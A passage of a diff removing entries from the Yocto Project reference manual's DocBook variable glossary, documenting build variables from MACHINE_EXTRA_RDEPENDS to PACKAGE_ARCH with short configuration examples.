- Some examples of these machine essentials are flash, screen, keyboard, mouse,
- or touchscreen drivers (depending on the machine).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-MACHINE_EXTRA_RDEPENDS'><glossterm>MACHINE_EXTRA_RDEPENDS</glossterm>
- <info>
- MACHINE_EXTRA_RDEPENDS[doc] = "A list of machine-specific packages to install as part of the image being built that are not essential for the machine to boot. However, the build process for more fully-featured images depends on the packages being present."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of machine-specific packages to install as part of the
- image being built that are not essential for the machine to boot.
- However, the build process for more fully-featured images
- depends on the packages being present.
- </para>
-
- <para>
- This variable affects all images based on
- <filename>packagegroup-base</filename>, which does not include the
- <filename>core-image-minimal</filename> or <filename>core-image-full-cmdline</filename>
- images.
- </para>
-
- <para>
- The variable is similar to the
- <filename><link linkend='var-MACHINE_EXTRA_RRECOMMENDS'>MACHINE_EXTRA_RRECOMMENDS</link></filename>
- variable with the exception that the image being built has a build
- dependency on the variable's list of packages.
- In other words, the image will not build if a file in this list is not found.
- </para>
-
- <para>
- An example is a machine that has WiFi capability but is not
- essential for the machine to boot the image.
- However, if you are building a more fully-featured image, you want to enable
- the WiFi.
- The package containing the firmware for the WiFi hardware is always
- expected to exist, so it is acceptable for the build process to depend upon
- finding the package.
- In this case, assuming the package for the firmware was called
- <filename>wifidriver-firmware</filename>, you would use the following in the
- <filename>.conf</filename> file for the machine:
- <literallayout class='monospaced'>
- MACHINE_EXTRA_RDEPENDS += "wifidriver-firmware"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-MACHINE_EXTRA_RRECOMMENDS'><glossterm>MACHINE_EXTRA_RRECOMMENDS</glossterm>
- <info>
- MACHINE_EXTRA_RRECOMMENDS[doc] = "A list of machine-specific packages to install as part of the image being built that are not essential for booting the machine. The image being built has no build dependencies on the packages in this list."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of machine-specific packages to install as part of the
- image being built that are not essential for booting the machine.
- The image being built has no build dependency on this list of packages.
- </para>
-
- <para>
- This variable affects only images based on
- <filename>packagegroup-base</filename>, which does not include the
- <filename>core-image-minimal</filename> or <filename>core-image-full-cmdline</filename>
- images.
- </para>
-
- <para>
- This variable is similar to the
- <filename><link linkend='var-MACHINE_EXTRA_RDEPENDS'>MACHINE_EXTRA_RDEPENDS</link></filename>
- variable with the exception that the image being built does not have a build
- dependency on the variable's list of packages.
- In other words, the image will build if a file in this list is not found.
- </para>
-
- <para>
- An example is a machine that has WiFi capability but is not essential
- For the machine to boot the image.
- However, if you are building a more fully-featured image, you want to enable
- WiFi.
- In this case, the package containing the WiFi kernel module will not be produced
- if the WiFi driver is built into the kernel, in which case you still want the
- build to succeed instead of failing as a result of the package not being found.
- To accomplish this, assuming the package for the module was called
- <filename>kernel-module-examplewifi</filename>, you would use the
- following in the <filename>.conf</filename> file for the machine:
- <literallayout class='monospaced'>
- MACHINE_EXTRA_RRECOMMENDS += "kernel-module-examplewifi"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-MACHINE_FEATURES'><glossterm>MACHINE_FEATURES</glossterm>
- <info>
- MACHINE_FEATURES[doc] = "Specifies the list of hardware features the MACHINE supports."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the list of hardware features the
- <link linkend='var-MACHINE'><filename>MACHINE</filename></link> is capable
- of supporting.
- For related information on enabling features, see the
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>,
- <link linkend='var-COMBINED_FEATURES'><filename>COMBINED_FEATURES</filename></link>,
- and
- <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
- variables.
- </para>
-
- <para>
- For a list of hardware features supported by the Yocto
- Project as shipped, see the
- "<link linkend='ref-features-machine'>Machine Features</link>"
- section.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-MACHINE_FEATURES_BACKFILL'><glossterm>MACHINE_FEATURES_BACKFILL</glossterm>
- <info>
- MACHINE_FEATURES_BACKFILL[doc] = "Features to be added to MACHINE_FEATURES if not also present in MACHINE_FEATURES_BACKFILL_CONSIDERED. This variable is set in the meta/conf/bitbake.conf file and is not intended to be user-configurable."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Features to be added to
- <filename><link linkend='var-MACHINE_FEATURES'>MACHINE_FEATURES</link></filename>
- if not also present in
- <filename><link linkend='var-MACHINE_FEATURES_BACKFILL_CONSIDERED'>MACHINE_FEATURES_BACKFILL_CONSIDERED</link></filename>.
- </para>
-
- <para>
- This variable is set in the <filename>meta/conf/bitbake.conf</filename> file.
- It is not intended to be user-configurable.
- It is best to just reference the variable to see which machine features are
- being backfilled for all machine configurations.
- See the "<link linkend='ref-features-backfill'>Feature Backfilling</link>" section for
- more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-MACHINE_FEATURES_BACKFILL_CONSIDERED'><glossterm>MACHINE_FEATURES_BACKFILL_CONSIDERED</glossterm>
- <info>
- MACHINE_FEATURES_BACKFILL_CONSIDERED[doc] = "Features from MACHINE_FEATURES_BACKFILL that should not be backfilled (i.e. added to MACHINE_FEATURES) during the build."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Features from
- <filename><link linkend='var-MACHINE_FEATURES_BACKFILL'>MACHINE_FEATURES_BACKFILL</link></filename>
- that should not be backfilled (i.e. added to
- <filename><link linkend='var-MACHINE_FEATURES'>MACHINE_FEATURES</link></filename>)
- during the build.
- See the "<link linkend='ref-features-backfill'>Feature Backfilling</link>" section for
- more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-MACHINEOVERRIDES'><glossterm>MACHINEOVERRIDES</glossterm>
- <info>
- MACHINEOVERRIDES[doc] = "A colon-separated list of overrides that apply to the current machine."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A colon-separated list of overrides that apply to the
- current machine.
- By default, this list includes the value of
- <link linkend='var-MACHINE'><filename>MACHINE</filename></link>.
- </para>
-
- <para>
- You can extend <filename>MACHINEOVERRIDES</filename>
- to add extra overrides that should apply to a machine.
- For example, all machines emulated in QEMU (e.g.
- <filename>qemuarm</filename>, <filename>qemux86</filename>,
- and so forth) include a file named
- <filename>meta/conf/machine/include/qemu.inc</filename>
- that prepends the following override to
- <filename>MACHINEOVERRIDES</filename>:
- <literallayout class='monospaced'>
- MACHINEOVERRIDES =. "qemuall:"
- </literallayout>
- This override allows variables to be overriden for all
- machines emulated in QEMU, like in the following example
- from the <filename>connman-conf</filename> recipe:
- <literallayout class='monospaced'>
- SRC_URI_append_qemuall = "file://wired.config \
- file://wired-setup \
- "
- </literallayout>
- The underlying mechanism behind
- <filename>MACHINEOVERRIDES</filename> is simply that it is
- included in the default value of
- <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-MAINTAINER'><glossterm>MAINTAINER</glossterm>
- <info>
- MAINTAINER[doc] = "The email address of the distribution maintainer."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The email address of the distribution maintainer.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-MIRRORS'><glossterm>MIRRORS</glossterm>
- <info>
- MIRRORS[doc] = "Specifies additional paths from which the OpenEmbedded build system gets source code."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies additional paths from which the OpenEmbedded
- build system gets source code.
- When the build system searches for source code, it first
- tries the local download directory.
- If that location fails, the build system tries locations
- defined by
- <link linkend='var-PREMIRRORS'><filename>PREMIRRORS</filename></link>,
- the upstream source, and then locations specified by
- <filename>MIRRORS</filename> in that order.
- </para>
-
- <para>
- Assuming your distribution
- (<link linkend='var-DISTRO'><filename>DISTRO</filename></link>)
- is "poky", the default value for
- <filename>MIRRORS</filename> is defined in the
- <filename>conf/distro/poky.conf</filename> file in the
- <filename>meta-poky</filename> Git repository.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-MLPREFIX'><glossterm>MLPREFIX</glossterm>
- <info>
- MLPREFIX[doc] = "Specifies a prefix has been added to PN to create a special version of a recipe or package (i.e. a Multilib version)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a prefix has been added to
- <link linkend='var-PN'><filename>PN</filename></link> to create a special version
- of a recipe or package (i.e. a Multilib version).
- The variable is used in places where the prefix needs to be
- added to or removed from a the name (e.g. the
- <link linkend='var-BPN'><filename>BPN</filename></link> variable).
- <filename>MLPREFIX</filename> gets set when a prefix has been
- added to <filename>PN</filename>.
- <note>
- The "ML" in <filename>MLPREFIX</filename> stands for
- "MultiLib".
- This representation is historical and comes from
- a time when <filename>nativesdk</filename> was a suffix
- rather than a prefix on the recipe name.
- When <filename>nativesdk</filename> was turned into a
- prefix, it made sense to set
- <filename>MLPREFIX</filename> for it as well.
- </note>
- </para>
-
- <para>
- To help understand when <filename>MLPREFIX</filename>
- might be needed, consider when
- <link linkend='var-BBCLASSEXTEND'><filename>BBCLASSEXTEND</filename></link>
- is used to provide a <filename>nativesdk</filename> version
- of a recipe in addition to the target version.
- If that recipe declares build-time dependencies on tasks in
- other recipes by using
- <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>,
- then a dependency on "foo" will automatically get rewritten
- to a dependency on "nativesdk-foo".
- However, dependencies like the following will not get
- rewritten automatically:
- <literallayout class='monospaced'>
- do_foo[depends] += "<replaceable>recipe</replaceable>:do_foo"
- </literallayout>
- If you want such a dependency to also get transformed,
- you can do the following:
- <literallayout class='monospaced'>
- do_foo[depends] += "${MLPREFIX}<replaceable>recipe</replaceable>:do_foo"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-module_autoload'><glossterm>module_autoload</glossterm>
- <info>
- module_autoload[doc] = "This variable has been replaced by the KERNEL_MODULE_AUTOLOAD variable. You should replace all occurrences of module_autoload with additions to KERNEL_MODULE_AUTOLOAD."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- This variable has been replaced by the
- <filename>KERNEL_MODULE_AUTOLOAD</filename> variable.
- You should replace all occurrences of
- <filename>module_autoload</filename> with additions to
- <filename>KERNEL_MODULE_AUTOLOAD</filename>, for example:
- <literallayout class='monospaced'>
- module_autoload_rfcomm = "rfcomm"
- </literallayout>
- </para>
-
- <para>
- should now be replaced with:
- <literallayout class='monospaced'>
- KERNEL_MODULE_AUTOLOAD += "rfcomm"
- </literallayout>
- See the
- <link linkend='var-KERNEL_MODULE_AUTOLOAD'><filename>KERNEL_MODULE_AUTOLOAD</filename></link>
- variable for more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-module_conf'><glossterm>module_conf</glossterm>
- <info>
- module_conf[doc] = "Specifies modprobe.d syntax lines for inclusion in the /etc/modprobe.d/modname.conf file."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies
- <ulink url='http://linux.die.net/man/5/modprobe.d'><filename>modprobe.d</filename></ulink>
- syntax lines for inclusion in the
- <filename>/etc/modprobe.d/modname.conf</filename> file.
- </para>
-
- <para>
- You can use this variable anywhere that it can be
- recognized by the kernel recipe or out-of-tree kernel
- module recipe (e.g. a machine configuration file, a
- distribution configuration file, an append file for the
- recipe, or the recipe itself).
- If you use this variable, you must also be sure to list
- the module name in the
- <link linkend='var-KERNEL_MODULE_AUTOLOAD'><filename>KERNEL_MODULE_AUTOLOAD</filename></link>
- variable.
- </para>
-
- <para>
- Here is the general syntax:
- <literallayout class='monospaced'>
- module_conf_<replaceable>module_name</replaceable> = "<replaceable>modprobe.d-syntax</replaceable>"
- </literallayout>
- You must use the kernel module name override.
- </para>
-
- <para>
- Run <filename>man modprobe.d</filename> in the shell to
- find out more information on the exact syntax
- you want to provide with <filename>module_conf</filename>.
- </para>
-
- <para>
- Including <filename>module_conf</filename> causes the
- OpenEmbedded build system to populate the
- <filename>/etc/modprobe.d/modname.conf</filename>
- file with <filename>modprobe.d</filename> syntax lines.
- Here is an example that adds the options
- <filename>arg1</filename> and <filename>arg2</filename>
- to a module named <filename>mymodule</filename>:
- <literallayout class='monospaced'>
- module_conf_mymodule = "options mymodule arg1=val1 arg2=val2"
- </literallayout>
- </para>
-
- <para>
- For information on how to specify kernel modules to
- auto-load on boot, see the
- <link linkend='var-KERNEL_MODULE_AUTOLOAD'><filename>KERNEL_MODULE_AUTOLOAD</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-MODULE_TARBALL_DEPLOY'><glossterm>MODULE_TARBALL_DEPLOY</glossterm>
- <info>
- MODULE_TARBALL_DEPLOY[doc] = "Controls creation of the modules-*.tgz file. Set this variable to "0" to disable creation of this file, which contains all of the kernel modules resulting from a kernel build."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Controls creation of the <filename>modules-*.tgz</filename>
- file.
- Set this variable to "0" to disable creation of this
- file, which contains all of the kernel modules resulting
- from a kernel build.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-MODULE_TARBALL_LINK_NAME'><glossterm>MODULE_TARBALL_LINK_NAME</glossterm>
- <info>
- MODULE_TARBALL_LINK_NAME[doc] = "The link name of the kernel module tarball."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The link name of the kernel module tarball.
- This variable is set in the
- <filename>meta/classes/kernel-artifact-names.bbclass</filename>
- file as follows:
- <literallayout class='monospaced'>
- MODULE_TARBALL_LINK_NAME ?= "${KERNEL_ARTIFACT_LINK_NAME}"
- </literallayout>
- The value of the <filename>KERNEL_ARTIFACT_LINK_NAME</filename>
- variable, which is set in the same file, has the following
- value:
- <literallayout class='monospaced'>
- KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
- </literallayout>
- </para>
-
- <para>
- See the
- <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
- variable for additional information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-MODULE_TARBALL_NAME'><glossterm>MODULE_TARBALL_NAME</glossterm>
- <info>
- MODULE_TARBALL_NAME[doc] = "The base name of the kernel module tarball."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The base name of the kernel module tarball.
- This variable is set in the
- <filename>meta/classes/kernel-artifact-names.bbclass</filename>
- file as follows:
- <literallayout class='monospaced'>
- MODULE_TARBALL_NAME ?= "${KERNEL_ARTIFACT_NAME}"
- </literallayout>
- The value of the
- <link linkend='var-KERNEL_ARTIFACT_NAME'><filename>KERNEL_ARTIFACT_NAME</filename></link>
- variable, which is set in the same file, has the following
- value:
- <literallayout class='monospaced'>
- KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
-<!--
- <glossentry id='var-MULTIMACH_HOST_SYS'><glossterm>MULTIMACH_HOST_SYS</glossterm>
- <info>
- MULTIMACH_HOST_SYS[doc] = "Separates files for different machines such that you can build for multiple host machines using the same output directories."
- </info>
- <glossdef>
- <para role="glossdeffirst">
--->
-<!--
- Serves the same purpose as
- <link linkend='var-MULTIMACH_TARGET_SYS'><filename>MULTIMACH_TARGET_SYS</filename></link>,
- but for the "HOST" system, in situations that involve a
- "HOST" and a "TARGET" system.
- See the
- <link linkend='var-STAGING_DIR_TARGET'><filename>STAGING_DIR_TARGET</filename></link>
- variable for more information.
- </para>
-
- <para>
- The default value of this variable is:
- <literallayout class='monospaced'>
- ${PACKAGE_ARCH}${HOST_VENDOR}-${HOST_OS}
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
--->
-
- <glossentry id='var-MULTIMACH_TARGET_SYS'><glossterm>MULTIMACH_TARGET_SYS</glossterm>
- <info>
- MULTIMACH_TARGET_SYS[doc] = "Separates files for different machines such that you can build for multiple target machines using the same output directories."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Uniquely identifies the type of the target system for
- which packages are being built.
- This variable allows output for different types of target
- systems to be put into different subdirectories of the same
- output directory.
- </para>
-
- <para>
- The default value of this variable is:
- <literallayout class='monospaced'>
- ${PACKAGE_ARCH}${TARGET_VENDOR}-${TARGET_OS}
- </literallayout>
- Some classes (e.g.
- <link linkend='ref-classes-cross-canadian'><filename>cross-canadian</filename></link>)
- modify the <filename>MULTIMACH_TARGET_SYS</filename> value.
- </para>
-
- <para>
- See the
- <link linkend='var-STAMP'><filename>STAMP</filename></link>
- variable for an example.
- See the
- <link linkend='var-STAGING_DIR_TARGET'><filename>STAGING_DIR_TARGET</filename></link>
- variable for more information.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-glossary-n'><title>N</title>
-
- <glossentry id='var-NATIVELSBSTRING'><glossterm>NATIVELSBSTRING</glossterm>
- <info>
- NATIVELSBSTRING[doc] = "A string identifying the host distribution."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A string identifying the host distribution.
- Strings consist of the host distributor ID
- followed by the release, as reported by the
- <filename>lsb_release</filename> tool
- or as read from <filename>/etc/lsb-release</filename>.
- For example, when running a build on Ubuntu 12.10, the value
- is "Ubuntu-12.10".
- If this information is unable to be determined, the value
- resolves to "Unknown".
- </para>
-
- <para>
- This variable is used by default to isolate native shared
- state packages for different distributions (e.g. to avoid
- problems with <filename>glibc</filename> version
- incompatibilities).
- Additionally, the variable is checked against
- <link linkend='var-SANITY_TESTED_DISTROS'><filename>SANITY_TESTED_DISTROS</filename></link>
- if that variable is set.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-NM'><glossterm>NM</glossterm>
- <info>
- NM[doc] = "Minimal command and arguments to run 'nm'."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The minimal command and arguments to run
- <filename>nm</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-NO_GENERIC_LICENSE'><glossterm>NO_GENERIC_LICENSE</glossterm>
- <info>
- NO_GENERIC_LICENSE[doc] = "Used to allow copying a license that does not exist in common licenses."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Avoids QA errors when you use a non-common, non-CLOSED
- license in a recipe.
- Packages exist, such as the linux-firmware package, with
- many licenses that are not in any way common.
- Also, new licenses are added occasionally to avoid
- introducing a lot of common license files, which are only
- applicable to a specific package.
- <filename>NO_GENERIC_LICENSE</filename> is used to allow
- copying a license that does not exist in common licenses.
- </para>
-
- <para>
- The following example shows how to add
- <filename>NO_GENERIC_LICENSE</filename> to a recipe:
- <literallayout class='monospaced'>
- NO_GENERIC_LICENSE[<replaceable>license_name</replaceable>] = "<replaceable>license_file_in_fetched_source</replaceable>"
- </literallayout>
- The following is an example that uses the
- <filename>LICENSE.Abilis.txt</filename> file as the license
- from the fetched source:
- <literallayout class='monospaced'>
- NO_GENERIC_LICENSE[Firmware-Abilis] = "LICENSE.Abilis.txt"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-NO_RECOMMENDATIONS'><glossterm>NO_RECOMMENDATIONS</glossterm>
- <info>
- NO_RECOMMENDATIONS[doc] = "When set to '1', no recommended packages will be installed. Some recommended packages might be required for certain system functionality, such as kernel-modules. It is up to the user to add packages to IMAGE_INSTALL as needed."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Prevents installation of all "recommended-only" packages.
- Recommended-only packages are packages installed only
- through the
- <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
- variable).
- Setting the <filename>NO_RECOMMENDATIONS</filename> variable
- to "1" turns this feature on:
- <literallayout class='monospaced'>
- NO_RECOMMENDATIONS = "1"
- </literallayout>
- </para>
-
- <para>
- You can set this variable globally in your
- <filename>local.conf</filename> file or you can attach it to
- a specific image recipe by using the recipe name override:
- <literallayout class='monospaced'>
- NO_RECOMMENDATIONS_pn-<replaceable>target_image</replaceable> = "1"
- </literallayout>
- </para>
-
- <para>
- It is important to realize that if you choose to not install
- packages using this variable and some other packages are
- dependent on them (i.e. listed in a recipe's
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
- variable), the OpenEmbedded build system ignores your
- request and will install the packages to avoid dependency
- errors.
- <note>
- Some recommended packages might be required for certain
- system functionality, such as kernel modules.
- It is up to you to add packages with the
- <link linkend='var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></link>
- variable.
- </note>
- </para>
-
- <para>
- Support for this variable exists only when using the
- IPK and RPM packaging backend.
- Support does not exist for DEB.
- </para>
-
- <para>
- See the
- <link linkend='var-BAD_RECOMMENDATIONS'><filename>BAD_RECOMMENDATIONS</filename></link>
- and the
- <link linkend='var-PACKAGE_EXCLUDE'><filename>PACKAGE_EXCLUDE</filename></link>
- variables for related information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-NOAUTOPACKAGEDEBUG'><glossterm>NOAUTOPACKAGEDEBUG</glossterm>
- <info>
- NOAUTOPACKAGEDEBUG[doc] = "Disables auto package from splitting .debug files."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Disables auto package from splitting
- <filename>.debug</filename> files. If a recipe requires
- <filename>FILES_${PN}-dbg</filename> to be set manually,
- the <filename>NOAUTOPACKAGEDEBUG</filename> can be defined
- allowing you to define the content of the debug package.
- For example:
- <literallayout class='monospaced'>
- NOAUTOPACKAGEDEBUG = "1"
- FILES_${PN}-dev = "${includedir}/${QT_DIR_NAME}/Qt/*"
- FILES_${PN}-dbg = "/usr/src/debug/"
- FILES_${QT_BASE_NAME}-demos-doc = "${docdir}/${QT_DIR_NAME}/qch/qt.qch"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
- </glossdiv>
-
- <glossdiv id='var-glossary-o'><title>O</title>
-
- <glossentry id='var-OBJCOPY'><glossterm>OBJCOPY</glossterm>
- <info>
- OBJCOPY[doc] = "Minimal command and arguments to run 'objcopy'."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The minimal command and arguments to run
- <filename>objcopy</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-OBJDUMP'><glossterm>OBJDUMP</glossterm>
- <info>
- OBJDUMP[doc] = "Minimal command and arguments to run 'objdump'."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The minimal command and arguments to run
- <filename>objdump</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-OE_BINCONFIG_EXTRA_MANGLE'><glossterm>OE_BINCONFIG_EXTRA_MANGLE</glossterm>
- <info>
- OE_BINCONFIG_EXTRA_MANGLE[doc] = "When a recipe inherits the binconfig.bbclass class, this variable specifies additional arguments passed to the "sed" command."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-binconfig'><filename>binconfig</filename></link>
- class, this variable
- specifies additional arguments passed to the "sed" command.
- The sed command alters any paths in configuration scripts
- that have been set up during compilation.
- Inheriting this class results in all paths in these scripts
- being changed to point into the
- <filename>sysroots/</filename> directory so that all builds
- that use the script will use the correct directories
- for the cross compiling layout.
- </para>
-
- <para>
- See the <filename>meta/classes/binconfig.bbclass</filename>
- in the
- <link linkend='source-directory'>Source Directory</link>
- for details on how this class applies these additional
- sed command arguments.
- For general information on the
- <filename>binconfig</filename> class, see the
- "<link linkend='ref-classes-binconfig'><filename>binconfig.bbclass</filename></link>"
- section.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-OE_IMPORTS'><glossterm>OE_IMPORTS</glossterm>
- <info>
- OE_IMPORTS[doc] = "An internal variable used to tell the OpenEmbedded build system what Python modules to import for every Python function run by the system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- An internal variable used to tell the OpenEmbedded build
- system what Python modules to import for every Python
- function run by the system.
- </para>
-
- <note>
- Do not set this variable.
- It is for internal use only.
- </note>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-OE_INIT_ENV_SCRIPT'><glossterm>OE_INIT_ENV_SCRIPT</glossterm>
- <info>
- OE_INIT_ENV_SCRIPT[doc] = "The name of the build environment setup script for the purposes of setting up the environment within the extensible SDK."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The name of the build environment setup script for the
- purposes of setting up the environment within the
- extensible SDK.
- The default value is "oe-init-build-env".
- </para>
-
- <para>
- If you use a custom script to set up your build
- environment, set the
- <filename>OE_INIT_ENV_SCRIPT</filename> variable to its
- name.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-OE_TERMINAL'><glossterm>OE_TERMINAL</glossterm>
- <info>
- OE_TERMINAL[doc] = "Controls how the OpenEmbedded build system spawns interactive terminals on the host development system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Controls how the OpenEmbedded build system spawns
- interactive terminals on the host development system
- (e.g. using the BitBake command with the
- <filename>-c devshell</filename> command-line option).
- For more information, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#platdev-appdev-devshell'>Using a Development Shell</ulink>" section
- in the Yocto Project Development Tasks Manual.
- </para>
-
- <para>
- You can use the following values for the
- <filename>OE_TERMINAL</filename> variable:
- <literallayout class='monospaced'>
- auto
- gnome
- xfce
- rxvt
- screen
- konsole
- none
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-OEROOT'><glossterm>OEROOT</glossterm>
- <info>
- OEROOT[doc] = "The directory from which the top-level build environment setup script is sourced."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The directory from which the top-level build environment
- setup script is sourced.
- The Yocto Project provides a top-level build environment
- setup script:
- <link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>.
- When you run this script, the
- <filename>OEROOT</filename> variable resolves to the
- directory that contains the script.
- </para>
-
- <para>
- For additional information on how this variable is used,
- see the initialization script.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-OLDEST_KERNEL'><glossterm>OLDEST_KERNEL</glossterm>
- <info>
- OLDEST_KERNEL[doc] = "Declares the oldest version of the Linux kernel that the produced binaries must support."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Declares the oldest version of the Linux kernel that the
- produced binaries must support.
- This variable is passed into the build of the Embedded
- GNU C Library (<filename>glibc</filename>).
- </para>
-
- <para>
- The default for this variable comes from the
- <filename>meta/conf/bitbake.conf</filename> configuration
- file.
- You can override this default by setting the variable
- in a custom distribution configuration file.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-OVERRIDES'><glossterm>OVERRIDES</glossterm>
- <info>
- OVERRIDES[doc] = "A colon-separated list of overrides that currently apply."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A colon-separated list of overrides that currently apply.
- Overrides are a BitBake mechanism that allows variables to
- be selectively overridden at the end of parsing.
- The set of overrides in <filename>OVERRIDES</filename>
- represents the "state" during building, which includes
- the current recipe being built, the machine for which
- it is being built, and so forth.
- </para>
-
- <para>
- As an example, if the string "an-override" appears as an
- element in the colon-separated list in
- <filename>OVERRIDES</filename>, then the following
- assignment will override <filename>FOO</filename> with the
- value "overridden" at the end of parsing:
- <literallayout class='monospaced'>
- FOO_an-override = "overridden"
- </literallayout>
- See the
- "<ulink url='&YOCTO_DOCS_BB_URL;#conditional-syntax-overrides'>Conditional Syntax (Overrides)</ulink>"
- section in the BitBake User Manual for more information on
- the overrides mechanism.
- </para>
-
- <para>
- The default value of <filename>OVERRIDES</filename>
- includes the values of the
- <link linkend='var-CLASSOVERRIDE'><filename>CLASSOVERRIDE</filename></link>,
- <link linkend='var-MACHINEOVERRIDES'><filename>MACHINEOVERRIDES</filename></link>,
- and
- <link linkend='var-DISTROOVERRIDES'><filename>DISTROOVERRIDES</filename></link>
- variables.
- Another important override included by default is
- <filename>pn-${PN}</filename>.
- This override allows variables to be set for a single
- recipe within configuration (<filename>.conf</filename>)
- files.
- Here is an example:
- <literallayout class='monospaced'>
- FOO_pn-myrecipe = "myrecipe-specific value"
- </literallayout>
- <note><title>Tip</title>
- An easy way to see what overrides apply is to search for
- <filename>OVERRIDES</filename> in the output of the
- <filename>bitbake -e</filename> command.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-debugging-viewing-variable-values'>Viewing Variable Values</ulink>"
- section in the Yocto Project Development Tasks
- Manual for more information.
- </note>
- </para>
- </glossdef>
- </glossentry>
- </glossdiv>
-
- <glossdiv id='var-glossary-p'><title>P</title>
-
- <glossentry id='var-P'><glossterm>P</glossterm>
- <info>
- P[doc] = "The recipe name and version. P is comprised of ${PN}-${PV}."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The recipe name and version.
- <filename>P</filename> is comprised of the following:
- <literallayout class='monospaced'>
- ${PN}-${PV}
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGE_ARCH'><glossterm>PACKAGE_ARCH</glossterm>
- <info>
- PACKAGE_ARCH[doc] = "The architecture of the resulting package or packages."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The architecture of the resulting package or packages.
- </para>
-
- <para>
- By default, the value of this variable is set to
- <link linkend='var-TUNE_PKGARCH'><filename>TUNE_PKGARCH</filename></link>
- when building for the target,
- <link linkend='var-BUILD_ARCH'><filename>BUILD_ARCH</filename></link>
- when building for the
- build host, and "${SDK_ARCH}-${SDKPKGSUFFIX}" when building
- for the SDK.
- <note>
- See
- <link linkend='var-SDK_ARCH'><filename>SDK_ARCH</filename></link>
- for more information.
- </note>
- However, if your recipe's output packages are built
- specific to the target machine rather than generally for
- the architecture of the machine, you should set
- <filename>PACKAGE_ARCH</filename> to the value of
- <link linkend='var-MACHINE_ARCH'><filename>MACHINE_ARCH</filename></link>
- in the recipe as follows:
- <literallayout class='monospaced'>
- PACKAGE_ARCH = "${MACHINE_ARCH}"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-PACKAGE_ARCHS'><glossterm>PACKAGE_ARCHS</glossterm>
- <info>
